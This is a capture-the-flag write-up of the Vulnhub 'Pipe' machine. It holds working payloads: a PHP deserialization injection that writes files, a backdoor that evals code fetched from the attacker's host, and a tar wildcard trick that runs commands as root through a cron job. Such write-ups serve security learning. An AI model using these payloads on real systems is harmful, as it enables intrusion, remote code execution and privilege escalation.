Mr_H4sh

Infosec, CTF and more

Pipe Solution

Hi guys, it’s been a while :)

Today I’m going to show you how I’ve completed the CTF called Pipe from Vulnhub.

Thanks to sagi- for the challenge.

First step: INFORMATION GATHERING

The description provided on Vulnhub said that the machine will have an IP assigned automatically. So, I ran the following command to discover the IP address of the victim machine:

fping -a -g 192.168.56.1/24 > alive_hosts.txt

# cat alive_hosts.txt

192.168.56.101 <== victim
192.168.56.103 <== attacker

After discovering that the victim’s IP address was 192.168.56.101 I made a port scanning to check the victim’s open ports.

nmap -sT -p- -Pn -T5 192.168.56.101 > nmap_scan.txt

# cat nmap_scan.txt 

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-10-10 13:48 BST
Nmap scan report for 192.168.56.101
Host is up (0.0015s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
51459/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 43.91 seconds

Looks good. The open ports look very interesting.

Second step: VULNERABILITY SCAN

When I opened http://192.168.56.101:80 this is what I found: screenshot-1-index

Uh oh… what about now? Time to scan.

Third step: WEB VULNERABILITY SCAN

Since I was blocked by a server side login page, I ran Dirbuster to check for some interesting folders

DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Mon Oct 12 22:41:55 BST 2015
--------------------------------

http://192.168.56.101:80
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/images/
/scriptz/

Dirs found with a 403 response:

/server-status/


--------------------------------
Files found during testing:

Files found with a 200 responce:

/scriptz/log.php.BAK
/scriptz/php.js


--------------------------------

I love this tool! Even if I think that this is pure luck. But the important thing is to reach the goal one way or another, right? ;)

I had a look at the file /scriptz/log.php.BAK, it turned into a class for logging. Nothing interesting. Same speech for the file /scriptz/php.js, nothing that gave me the opportunity to bypass the login page.

Then I started playing with cURL, sending some requests, and this gave me something interesting:

# curl -X POST -d 'bar=foo' 192.168.56.101/index.php

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script src="scriptz/php.js"></script>
<script>
function submit_form() {
var object = serialize({id: 1, firstname: 'Rene', surname: 'Margitte', artwork: 'The Treachery of Images'}); 
object = object.substr(object.indexOf("{"),object.length);
object = "O:4:\"Info\":4:" + object;
document.forms[0].param.value = object;
document.getElementById('info_form').submit();
}
</script> 
<title>The Treachery of Images</title>
</head>
<h1><i>The Treachery of Images</i></h1>
<hr />
From Wikipedia, the free encyclopedia
<br />
<br />
The Treachery of Images (French: La trahison des images, 1928–29, sometimes translated as The Treason of Images) is a painting by the Belgian surrealist painter René Magritte, painted when Magritte was 30 years old. The picture shows a pipe. Below it, Magritte painted, "Ceci n'est pas une pipe." [sə.si ne paz‿yn pip], French for "This is not a pipe."
<p>
"The famous pipe. How people reproached me for it! And yet, could you stuff my pipe? No, it's just a representation, is it not? So if I had written on my picture 'This is a pipe', I'd have been lying!"
</p>
His statement is taken to mean that the painting itself is not a pipe. The painting is merely an image of a pipe. Hence, the description, "this is not a pipe." The theme of pipes with the text "Ceci n'est pas une pipe" is extended in his 1966 painting, Les Deux Mystères. It is currently on display at the Los Angeles County Museum of Art.
The painting is sometimes given as an example of meta message conveyed by paralanguage. Compare with Korzybski's "The word is not the thing" and "The map is not the territory".
<br />
<br />
<center><div style="width:500px;overflow:hidden;" >
   <img src="images/pipe.jpg" width="400px" height="auto" border="1">
</div>
<form action="index.php" id="info_form" method="POST">
   <input type="hidden" name="param" value="" />
   <a href="#" onclick="submit_form(); return false;">Show Artist Info.</a>
</form></center></html>

NICE! So, I ran Live HTTP Headers to execute the same operation on Icewased (or Firefox) and this is what I found: index

I had a look at the code again. I noticed a link pointing to a function called submit_form, and a hidden value called param. Basically it was firing a POST request with a serialized object created by the function submit_form whenever I was clicking on “Show Artist Info.”… and it was done client side, which was “great” (for me).

Do you remember when I said that the there were nothing interesting into the file /scriptz/log.php.BAK? Well… code is golden! Looks like that the backup file was showing us that the class was accepting a filename and some data… so I made some tests and I had luck with this:  params=O:3:"Log":2:{s:8:"filename";s:33:"/var/www/html/scriptz/phpinfo.php";s:4:"data";s:21:"<?php echo phpinfo();";}

And this is what I found: phpinfo

Third step: EXPLOITATION

So, I uploaded a web shell to navigate within the server with the following request:

param=O:3:"Log":2:{s:8:"filename";s:35:"/var/www/html/scriptz/backdoor6.php";s:4:"data";s:117:"<?php error_reporting(E_ALL); ini_set('display_errors', 1); $file = file_get_contents($_GET['file']); eval($file); ?>";}

And with this URL I uploaded the webshell: http://192.168.56.101/scriptz/backdoor6.php?file=http://192.168.56.103/test_shell/shell.txt

webshell

Sweet, shell uploaded successfully, time to find something interesting.

I found the file .htpasswd with the following content, but I couldn’t crack the password:

rene:$apr1$wfYjXf4U$0ZZ.qhGGrtkOxvKr5WFqX/

I wondered around a bit more (passwd, shadow, rc.local), and finally I found something interesting in /etc/crontab:

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /root/create_backup.sh
*/5 * * * * root /usr/bin/compress.sh

What have I found at a glance? A script owned by root in into /usr/bin, and this was the content:

#!/bin/sh

rm -f /home/rene/backup/backup.tar.gz
cd /home/rene/backup
tar cfz /home/rene/backup/backup.tar.gz *
chown rene:rene /home/rene/backup/backup.tar.gz
rm -f /home/rene/backup/*.BAK

I spent a bit of time, and I found out that tar allows to execute arbitrary commands, as I read in here, on the point 4.3.

The idea was to execute a command by root when the crontab was executed again.

So, I did some practice:

echo "cp /root/flag.txt /tmp/flag.txt; chmod a+r /tmp/flag.txt" > exploit.sh
touch /home/rene/backup/--checkpoint=1
touch /home/rene/backup/--checkpoint-action=exec=sh\ exploit.sh

And after a minute…

ls -l /tmp
-rw-r--r-- 1 root root 4251 Oct 16 07:35 flag.txt

cat /tmp/flag.txt
                                                                   .aMMMMMMMMn.  ,aMMMMn.
                                                                 .aMccccccccc*YMMn.    `Mb
                                                                aMccccccccccccccc*Mn    MP
                                                               .AMMMMn.   MM `*YMMY*ccaM*
                                                              dM*  *YMMb  YP        `cMY
                                                              YM.  .dMMP   aMn.     .cMP
                                                               *YMMn.     aMMMMMMMMMMMY'
                                                                .'YMMb.           ccMP
                                                             .dMcccccc*Mc....cMb.cMP'
                                                           .dMMMMb;cccc*Mbcccc,IMMMMMMMn.
                                                          dY*'  '*M;ccccMM..dMMM..MP*cc*Mb
                                                          YM.    ,MbccMMMMMMMMMMMM*cccc;MP
                                                           *Mbn;adMMMMMMMMMMMMMMMIcccc;M*
                                                          dPcccccIMMMMMMMMMMMMMMMMa;c;MP
                                                          Yb;cc;dMMMMMMMMMMMP*'  *YMMP*
                                                           *YMMMPYMMMMMMP*'          curchack
                                                       +####################################+
                                                       |======                            | |
                                                       |======                            | |
                                                       |======                            | |
                                                       |======                            | |
                                                       |======                            | |
                                                       +----------------------------------+-+
                                                        ####################################
                                                             |======                  |
                                                             |======                  |
                                                             |=====                   |
                                                             |====                    |
                                                             |                        |
                                                             +                        +

 .d8888b.                 d8b          d8b               888                                                                    d8b
d88P  Y88b                Y8P          88P               888                                                                    Y8P
888    888                             8P                888
888        .d88b.  .d8888b888   88888b."  .d88b. .d8888b 888888   88888b.  8888b. .d8888b    888  88888888b.  .d88b.    88888b. 88888888b.  .d88b.
888       d8P  Y8bd88P"   888   888 "88b d8P  Y8b88K     888      888 "88b    "88b88K        888  888888 "88bd8P  Y8b   888 "88b888888 "88bd8P  Y8b
888    88888888888888     888   888  888 88888888"Y8888b.888      888  888.d888888"Y8888b.   888  888888  88888888888   888  888888888  88888888888
Y88b  d88PY8b.    Y88b.   888   888  888 Y8b.         X88Y88b.    888 d88P888  888     X88   Y88b 888888  888Y8b.       888 d88P888888 d88PY8b.   d8b
 "Y8888P"  "Y8888  "Y8888P888   888  888  "Y8888  88888P' "Y888   88888P" "Y888888 88888P'    "Y88888888  888 "Y8888    88888P" 88888888P"  "Y8888Y8P
                                                                  888                                                   888        888
                                                                  888                                                   888        888
                                                                  888                                                   888        888
Well Done!
Here's your flag: 0089cd4f9ae79402cdd4e7b8931892b7

Conclusion

Nice, I’ve enjoyed it. The good thing is that at every challenge you’ll learn something new.

Thank you to sagi- for the effort.

As usual, for any information or feedback, please do not hesitate to leave a comment.

./A